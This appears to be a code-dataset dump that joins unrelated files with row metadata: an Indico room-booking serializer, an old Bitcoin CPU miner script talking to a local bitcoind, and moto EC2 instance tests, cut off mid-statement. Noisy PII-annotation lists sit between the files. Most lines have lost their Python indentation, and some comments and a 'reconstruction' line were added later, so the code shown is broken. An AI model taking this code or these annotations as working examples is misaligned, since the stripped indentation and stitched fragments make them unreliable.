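#   reservations = OrderedMultiDict(_export_reservations(hook, True, False))
#   per_room = reservations.getlist(room.id)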
def _serializable_room(room_data, reservations=None):
"""Serializable room data
:param room_data: Room data
:param reservations: MultiDict mapping for room id => reservations
"""
data = room_data['room'].to_serializable('__api_public__')
data['_type'] = 'Room'
data['avc'] = bool(room_data['vc_equipment'])
data['vcList'] = room_data['vc_equipment']
data['equipment'] = room_data['non_vc_equipment']
if reservations is not None:
data['reservations'] = reservations.getlist(room_data['room'].id)
return data
def _serializable_room_minimal(room):
"""Serializable minimal room data (inside reservations)
:param room: A `Room`
"""
data = room.to_serializable('__api_minimal_public__')
data['_type'] = 'Room'
return data
def _serializable_reservation(reservation_data, include_room=False):
"""Serializable reservation (standalone or inside room)
:param reservation_data: Reservation data
:param include_room: Include minimal room information
"""
reservation = reservation_data['reservation']
data = reservation.to_serializable('__api_public__', converters={datetime: _add_server_tz})
data['_type'] = 'Reservation'
data['repeatability'] = None
if reservation.repeat_frequency:
data['repeatability'] = RepeatMapping.get_short_name(*reservation.repetition)
data['vcList'] = reservation_data['vc_equipment']
if include_room:
data['room'] = _serializable_room_minimal(reservation_data['reservation'].room)
if 'occurrences' in reservation_data:
data['occurrences'] = [o.to_serializable('__api_public__', converters={datetime: _add_server_tz})
for o in reservation_data['occurrences']]
return data
def _ical_serialize_repeatability(data):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = data['endDT'].astimezone(pytz.utc)
WEEK_DAYS = 'MO TU WE TH FR SA SU'.split()
recur = ical.vRecur()
recur['until'] = end_dt_utc
if data['repeat_frequency'] == RepeatFrequency.DAY:
recur['freq'] = 'daily'
elif data['repeat_frequency'] == RepeatFrequency.WEEK:
recur['freq'] = 'weekly'
recur['interval'] = data['repeat_interval']
elif data['repeat_frequency'] == RepeatFrequency.MONTH:
recur['freq'] = 'monthly'
recur['byday'] = '{}{}'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()])
return recur
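# Added illustration: for a booking repeating every second week the vRecur
# built above serializes to roughly "FREQ=WEEKLY;UNTIL=<end>;INTERVAL=2",
# while a monthly booking pins the weekday ordinal via BYDAY (e.g. "2WE").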
def _ical_serialize_reservation(cal, data, now):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = datetime.combine(data['startDT'].date(), data['endDT'].timetz()).astimezone(pytz.utc)
event = icalendar.Event()
    # uid address was redacted in this corpus; a '%d' is reinstated here
    # (labeled reconstruction) so the format call parses and runs
    event.add('uid', 'dummy-%d@email.com' % data['id'])
event.add('dtstamp', now)
event.add('dtstart', start_dt_utc)
event.add('dtend', end_dt_utc)
event.add('url', data['bookingUrl'])
event.add('summary', data['reason'])
event.add('location', u'{}: {}'.format(data['location'], data['room']['fullName']))
event.add('description', data['reason'].decode('utf-8') + '\n\n' + data['bookingUrl'])
if data['repeat_frequency'] != RepeatFrequency.NEVER:
event.add('rrule', _ical_serialize_repeatability(data))
cal.add_component(event)
def _add_server_tz(dt):
if dt.tzinfo is None:
return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone()))
return dt
def _yesno(value):
return value.lower() in {'yes', 'y', '1', 'true'}
def _get_reservation_state_filter(params):
cancelled = get_query_parameter(params, ['cxl', 'cancelled'])
rejected = get_query_parameter(params, ['rej', 'rejected'])
confirmed = get_query_parameter(params, ['confirmed'])
archived = get_query_parameter(params, ['arch', 'archived', 'archival'])
repeating = get_query_parameter(params, ['rec', 'recurring', 'rep', 'repeating'])
avc = get_query_parameter(params, ['avc'])
avc_support = get_query_parameter(params, ['avcs', 'avcsupport'])
startup_support = get_query_parameter(params, ['sts', 'startupsupport'])
booked_for = get_query_parameter(params, ['bf', 'bookedfor'])
filters = []
if cancelled is not None:
filters.append(Reservation.is_cancelled == _yesno(cancelled))
if rejected is not None:
filters.append(Reservation.is_rejected == _yesno(rejected))
if confirmed is not None:
if confirmed == 'pending':
filters.append(Reservation.is_pending)
elif _yesno(confirmed):
filters.append(Reservation.is_accepted)
else:
filters.append(~Reservation.is_accepted)
filters.append(Reservation.is_rejected | Reservation.is_cancelled)
if archived is not None:
filters.append(Reservation.is_archived == _yesno(archived))
if repeating is not None:
if _yesno(repeating):
filters.append(Reservation.repeat_frequency != 0)
else:
filters.append(Reservation.repeat_frequency == 0)
if avc is not None:
filters.append(Reservation.uses_vc == _yesno(avc))
if avc_support is not None:
filters.append(Reservation.needs_vc_assistance == _yesno(avc_support))
if startup_support is not None:
filters.append(Reservation.needs_assistance == _yesno(startup_support))
if booked_for:
like_str = '%{}%'.format(booked_for.replace('?', '_').replace('*', '%'))
filters.append(Reservation.booked_for_name.ilike(like_str))
return filters
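# Added illustration: a query string like "?confirmed=pending&rec=y" yields
# [Reservation.is_pending, Reservation.repeat_frequency != 0], which the
# exporters above combine with their date-range filters.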
| 16,517 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'Indico'], ['DATE_TIME', '2002 - 2013'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'indico.modules.rb.models.rooms'], ['LOCATION', 'super(RoomBookingHookBase'], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'self)._getParams'], ['PERSON', 'self)._getParams'], ['DATE_TIME', "the same day'"], ['PERSON', "HTTPAPIError('You"], ['PERSON', 'NEVER'], ['PERSON', "self._params['reason"], ['PERSON', 'db.session.flush'], ['PERSON', 'include_rooms'], ['PERSON', '.split'], ['PERSON', 'reservations_data = Reservation.get_with_data(*data'], ['PERSON', 'include_rooms'], ['NRP', 'MultiDict'], ['LOCATION', 'serializable_reservation(reservation_data'], ['DATE_TIME', 'daily'], ['DATE_TIME', 'weekly'], ['DATE_TIME', 'monthly'], ['DATE_TIME', 'WEEK_DAYS[start_dt_utc.weekday'], ['PERSON', "data['id"], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'RepeatFrequency.NE'], ['PERSON', 'bookedfor'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'indico.core.co'], ['URL', 'indico.co'], ['URL', 'indico.core.er'], ['URL', 'indico.mo'], ['URL', 'indico.modules.rb.models.re'], ['URL', 'indico.modules.rb.mo'], ['URL', 'indico.modules.rb.models.ro'], ['URL', 'indico.web.ht'], ['URL', 'indico.web.ht'], ['URL', 'api.me'], ['URL', 'indico.web.ht'], ['URL', 'api.re'], ['URL', 'indico.web.ht'], ['URL', 'MaKaC.au'], ['URL', 'MaKaC.common.in'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'Room.id.in'], ['URL', 'loc.id'], ['URL', 'Reservation.ro'], ['URL', 'id.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Config.ge'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'loc.id'], ['URL', 'Room.name.il'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Location.name.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'datetime.no'], ['URL', 'params.it'], ['URL', 'Room.ge'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'RepeatFrequency.NE'], ['URL', 'room.id'], ['URL', 'Reservation.cr'], ['URL', 'aw.ge'], ['URL', 'db.session.ad'], ['URL', 'db.se'], ['URL', 'reservation.id'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'datetime.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'order.de'], ['URL', 'Reservation.ge'], ['URL', 'reservations.ge'], ['URL', 'room.to'], ['URL', 'reservation.to'], ['URL', 'reservation.re'], ['URL', 'RepeatMapping.ge'], ['URL', 'reservation.re'], ['URL', 'o.to'], ['URL', 'RepeatFrequency.MO'], ['URL', 'datetime.com'], ['URL', 'event.ad'], ['URL', 'email.com'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'cal.ad'], ['URL', 'dt.tz'], ['URL', 'dt.re'], ['URL', 'HelperMaKaCInfo.ge'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.re'], ['URL', 'Reservation.re'], ['URL', 'Reservation.us'], ['URL', 
'Reservation.ne'], ['URL', 'Reservation.ne'], ['URL', 'for.re'], ['URL', 'Reservation.bo'], ['URL', 'name.il']] |
67 | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
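# Added note: these helpers undo Bitcoin's little-endian conventions, e.g.
# bytereverse(0x12345678) == 0x78563412; bufreverse() byte-swaps each 4-byte
# word and wordreverse() reverses the word order, so the final sha256d digest
# can be compared against the big-endian target below.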
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
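        # Added note (midstate optimization): the first 76 header bytes never
        # change, so hash them once and re-hash only the 4-byte nonce per try.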
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
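        # Added note: the 80-byte header is hex-encoded (160 chars) and the
        # nonce occupies bytes 76..80, i.e. hex chars 152..160; splice the new
        # nonce in and keep the trailing getwork padding unchanged.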
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
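        # Added note: re-target max_nonce so the next work() pass takes about
        # settings['scantime'] seconds at the hash rate just measured.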
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9131
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
| 6,434 | [['DATE_TIME', '2011'], ['PERSON', "out_words.append(struct.pack('@I"], ['PERSON', 'Miner'], ['LOCATION', 'targetstr'], ['DATE_TIME', 'the first 76b of 80b'], ['DATE_TIME', '16'], ['PERSON', 'hash1 = hash1_o.digest'], ['LOCATION', 'hash_o.update(hash1'], ['PERSON', 'param_arr ='], ['PERSON', 'hashes_done'], ['DATE_TIME', 'time_end - time_start'], ['PERSON', 'hashes_done'], ['PERSON', 'hashes_done'], ['PERSON', 'scantime'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '::'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pprint.Pr'], ['URL', 'self.au'], ['URL', 'self.co'], ['URL', 'httplib.HT'], ['URL', 'self.conn.re'], ['URL', 'self.au'], ['URL', 'self.conn.ge'], ['URL', 'resp.re'], ['URL', 'struct.pa'], ['URL', 'words.re'], ['URL', 'self.id'], ['URL', 'self.ma'], ['URL', 'datastr.de'], ['URL', 'targetstr.de'], ['URL', 'hashlib.sh'], ['URL', 'self.ma'], ['URL', 'struct.pa'], ['URL', 'hash.co'], ['URL', 'hashlib.sh'], ['URL', 'time.as'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.id'], ['URL', 'self.su'], ['URL', 'self.it'], ['URL', 'sys.ar'], ['URL', 'pyminer.py'], ['URL', 'sys.ar'], ['URL', 're.se'], ['URL', 're.se'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'f.cl'], ['URL', 'p.st'], ['URL', 'time.sl'], ['URL', 'time.as'], ['URL', 'proc.jo'], ['URL', 'time.as']] |
68 | from __future__ import unicode_literals
from botocore.exceptions import ClientError
import pytest
from unittest import SkipTest
import base64
import ipaddress
import six
import boto
import boto3
from boto.ec2.instance import Reservation, InstanceAttribute
from boto.exception import EC2ResponseError
from freezegun import freeze_time
import sure # noqa
from moto import mock_ec2_deprecated, mock_ec2, settings
from tests import EXAMPLE_AMI_ID
from tests.helpers import requires_boto_gte
if six.PY2:
decode_method = base64.decodestring
else:
decode_method = base64.decodebytes
################ Test Readme ###############
def add_servers(ami_id, count):
conn = boto.connect_ec2()
for index in range(count):
conn.run_instances(ami_id)
@mock_ec2_deprecated
def test_add_servers():
add_servers(EXAMPLE_AMI_ID, 2)
conn = boto.connect_ec2()
reservations = conn.get_all_reservations()
assert len(reservations) == 2
instance1 = reservations[0].instances[0]
assert instance1.image_id == EXAMPLE_AMI_ID
############################################
@freeze_time("2014-01-01 05:00:00")
@mock_ec2_deprecated
def test_instance_launch_and_terminate():
conn = boto.ec2.connect_to_region("us-east-1")
with pytest.raises(EC2ResponseError) as ex:
reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set"
)
reservation = conn.run_instances(EXAMPLE_AMI_ID)
reservation.should.be.a(Reservation)
reservation.instances.should.have.length_of(1)
instance = reservation.instances[0]
instance.state.should.equal("pending")
reservations = conn.get_all_reservations()
reservations.should.have.length_of(1)
reservations[0].id.should.equal(reservation.id)
instances = reservations[0].instances
instances.should.have.length_of(1)
instance = instances[0]
instance.id.should.equal(instance.id)
instance.state.should.equal("running")
instance.launch_time.should.equal("2014-01-01T05:00:00.000Z")
instance.vpc_id.shouldnt.equal(None)
instance.placement.should.equal("us-east-1a")
root_device_name = instance.root_device_name
instance.block_device_mapping[root_device_name].status.should.equal("in-use")
volume_id = instance.block_device_mapping[root_device_name].volume_id
volume_id.should.match(r"vol-\w+")
volume = conn.get_all_volumes(volume_ids=[volume_id])[0]
volume.attach_data.instance_id.should.equal(instance.id)
volume.status.should.equal("in-use")
with pytest.raises(EC2ResponseError) as ex:
conn.terminate_instances([instance.id], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set"
)
conn.terminate_instances([instance.id])
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.state.should.equal("terminated")
@mock_ec2
def test_instance_terminate_discard_volumes():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
"DeviceName": "/dev/sda1",
"Ebs": {"VolumeSize": 50, "DeleteOnTermination": True},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
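    # Added note: with DeleteOnTermination=True the attached EBS volume is
    # discarded together with the instance, so no volumes should remain.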
assert not list(ec2_resource.volumes.all())
@mock_ec2
def test_instance_terminate_keep_volumes_explicit():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
"DeviceName": "/dev/sda1",
"Ebs": {"VolumeSize": 50, "DeleteOnTermination": False},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 1
@mock_ec2
def test_instance_terminate_keep_volumes_implicit():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}}],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(instance_volume_ids) == 1
volume = ec2_resource.Volume(instance_volume_ids[0])
volume.state.should.equal("available")
@mock_ec2
def test_instance_terminate_detach_volumes():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}},
{"DeviceName": "/dev/sda2", "Ebs": {"VolumeSize": 50}},
],
)
instance = result[0]
for volume in instance.volumes.all():
response = instance.detach_volume(VolumeId=volume.volume_id)
response["State"].should.equal("detaching")
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 2
@mock_ec2
def test_instance_detach_volume_wrong_path():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}},],
)
instance = result[0]
for volume in instance.volumes.all():
with pytest.raises(ClientError) as ex:
instance.detach_volume(VolumeId=volume.volume_id, Device="/dev/sdf")
ex.value.response["Error"]["Code"].should.equal("InvalidAttachment.NotFound")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The volume {0} is not attached to instance {1} as device {2}".format(
volume.volume_id, instance.instance_id, "/dev/sdf"
)
)
@mock_ec2_deprecated
def test_terminate_empty_instances():
conn = boto.connect_ec2("the_key", "the_secret")
conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError)
@freeze_time("2014-01-01 05:00:00")
@mock_ec2_deprecated
def test_instance_attach_volume():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
vol1 = conn.create_volume(size=36, zone=conn.region.name)
vol1.attach(instance.id, "/dev/sda1")
vol1.update()
vol2 = conn.create_volume(size=65, zone=conn.region.name)
vol2.attach(instance.id, "/dev/sdb1")
vol2.update()
vol3 = conn.create_volume(size=130, zone=conn.region.name)
vol3.attach(instance.id, "/dev/sdc1")
vol3.update()
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.block_device_mapping.should.have.length_of(3)
for v in conn.get_all_volumes(
volume_ids=[instance.block_device_mapping["/dev/sdc1"].volume_id]
):
v.attach_data.instance_id.should.equal(instance.id)
# can do due to freeze_time decorator.
v.attach_data.attach_time.should.equal(instance.launch_time)
# can do due to freeze_time decorator.
v.create_time.should.equal(instance.launch_time)
v.region.name.should.equal(instance.region.name)
v.status.should.equal("in-use")
@mock_ec2_deprecated
def test_get_instances_by_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
reservations = conn.get_all_reservations(instance_ids=[instance1.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(1)
reservation.instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(2)
instance_ids = [instance.id for instance in reservation.instances]
instance_ids.should.equal([instance1.id, instance2.id])
# Call get_all_reservations with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_reservations(instance_ids=[instance1.id, "i-1234abcd"])
cm.value.code.should.equal("InvalidInstanceID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_get_paginated_instances():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
for i in range(100):
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
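    # Added note: with 100 reservations and MaxResults=50 the results arrive
    # in two pages linked by NextToken; the final page carries no token.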
resp = client.describe_instances(MaxResults=50)
reservations = resp["Reservations"]
reservations.should.have.length_of(50)
next_token = resp["NextToken"]
next_token.should_not.be.none
resp2 = client.describe_instances(NextToken=next_token)
reservations.extend(resp2["Reservations"])
reservations.should.have.length_of(100)
assert "NextToken" not in resp2.keys()
@mock_ec2
def test_create_with_tags():
ec2 = boto3.client("ec2", region_name="us-west-2")
instances = ec2.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
InstanceType="t2.micro",
TagSpecifications=[
{
"ResourceType": "instance",
"Tags": [
{"Key": "MY_TAG1", "Value": "MY_VALUE1"},
{"Key": "MY_TAG2", "Value": "MY_VALUE2"},
],
},
{
"ResourceType": "instance",
"Tags": [{"Key": "MY_TAG3", "Value": "MY_VALUE3"}],
},
],
)
assert "Tags" in instances["Instances"][0]
len(instances["Instances"][0]["Tags"]).should.equal(3)
@mock_ec2_deprecated
def test_get_instances_filtering_by_state():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
conn.terminate_instances([instance1.id])
reservations = conn.get_all_reservations(filters={"instance-state-name": "running"})
reservations.should.have.length_of(1)
# Since we terminated instance1, only instance2 and instance3 should be
# returned
instance_ids = [instance.id for instance in reservations[0].instances]
set(instance_ids).should.equal(set([instance2.id, instance3.id]))
reservations = conn.get_all_reservations(
[instance2.id], filters={"instance-state-name": "running"}
)
reservations.should.have.length_of(1)
instance_ids = [instance.id for instance in reservations[0].instances]
instance_ids.should.equal([instance2.id])
reservations = conn.get_all_reservations(
[instance2.id], filters={"instance-state-name": "terminated"}
)
list(reservations).should.equal([])
# get_all_reservations should still return all 3
reservations = conn.get_all_reservations()
reservations[0].instances.should.have.length_of(3)
conn.get_all_reservations.when.called_with(
filters={"not-implemented-filter": "foobar"}
).should.throw(NotImplementedError)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
reservations = conn.get_all_reservations(filters={"instance-id": instance1.id})
# get_all_reservations should return just instance1
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={"instance-id": [instance1.id, instance2.id]}
)
# get_all_reservations should return two
reservations[0].instances.should.have.length_of(2)
reservations = conn.get_all_reservations(filters={"instance-id": "non-existing-id"})
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_type():
conn = boto.connect_ec2()
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="m1.small")
instance1 = reservation1.instances[0]
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="m1.small")
instance2 = reservation2.instances[0]
reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="t1.micro")
instance3 = reservation3.instances[0]
reservations = conn.get_all_reservations(filters={"instance-type": "m1.small"})
# get_all_reservations should return instance1,2
reservations.should.have.length_of(2)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
instance_ids = [reservations[0].instances[0].id, reservations[1].instances[0].id]
set(instance_ids).should.equal(set([instance1.id, instance2.id]))
reservations = conn.get_all_reservations(filters={"instance-type": "t1.micro"})
# get_all_reservations should return one
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(
filters={"instance-type": ["t1.micro", "m1.small"]}
)
reservations.should.have.length_of(3)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
reservations[2].instances.should.have.length_of(1)
instance_ids = [
reservations[0].instances[0].id,
reservations[1].instances[0].id,
reservations[2].instances[0].id,
]
set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id]))
reservations = conn.get_all_reservations(filters={"instance-type": "bogus"})
# bogus instance-type should return none
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_reason_code():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
reservations = conn.get_all_reservations(
